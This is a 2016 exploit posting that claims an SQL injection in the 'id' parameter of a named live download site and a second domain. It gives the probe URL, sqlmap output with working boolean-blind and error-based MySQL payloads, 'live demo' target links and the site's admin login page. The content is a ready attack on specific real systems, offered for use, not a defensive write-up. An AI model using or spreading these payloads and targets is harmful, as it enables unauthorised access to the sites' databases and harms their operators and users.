Arabseed XCMS 1.0.9 SQL Injection
Posted on 08 September 2016
###################### # Exploit Title : Arabseed XCMS V1.0.9 SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Vendor Homepage : http://arabseed.com/ # Tested on: [ BACKBOX] # MyBlog : http://xbadgirl21.blogspot.com/ # skype:xbadgirl21 # Date: 07/09/2016 # video Proof : https://youtu.be/ABNSN3XecHw ###################### # [a] DESCRIPTION : ###################### # [+] Arabseed is an Download Website | Movies,Tv show,Songs And Forums . # [+] Arabseed is an Famous Webiste in Arabic Country's # [+] AND an SQL injection has been Detected in his subdomain : wn.arabseed.com ###################### # [a] Poc : ###################### # When You want to Download Any Thing From the Website You Will Notice a Redirection to the # Subdomain : http://wn.arabseed.com/m1.php?id=[SQLi] # [id] Get Parameter Vulnerable To SQLi # http://wn.arabseed.com/m1.php?id=2358249' ###################### # [a] SQLmap PoC: ###################### # GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N # sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests: # --- #Parameter: id (GET) # Type: boolean-based blind # Title: MySQL >= 5.0 boolean-based blind - Parameter replace # Payload: id=(SELECT (CASE WHEN (4787=4787) THEN 4787 ELSE 4787*(SELECT 4787 FROM # INFORMATION_SCHEMA.CHARACTER_SETS) END)) # # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) # Payload: id=2358249 AND (SELECT 4091 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT ( # ELT(4091=4091,1))),0x7162627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # --- # # --- # GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ###################### # [a] Live Demo : ###################### # http://wn.arabseed.com/m1.php?id=2358249 # http://wwenews.us/m1.php?id=298733 ###################### # [a] Admin Dashboard : ###################### # http://www.arabseed.com/ar/user/auth/login.html ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################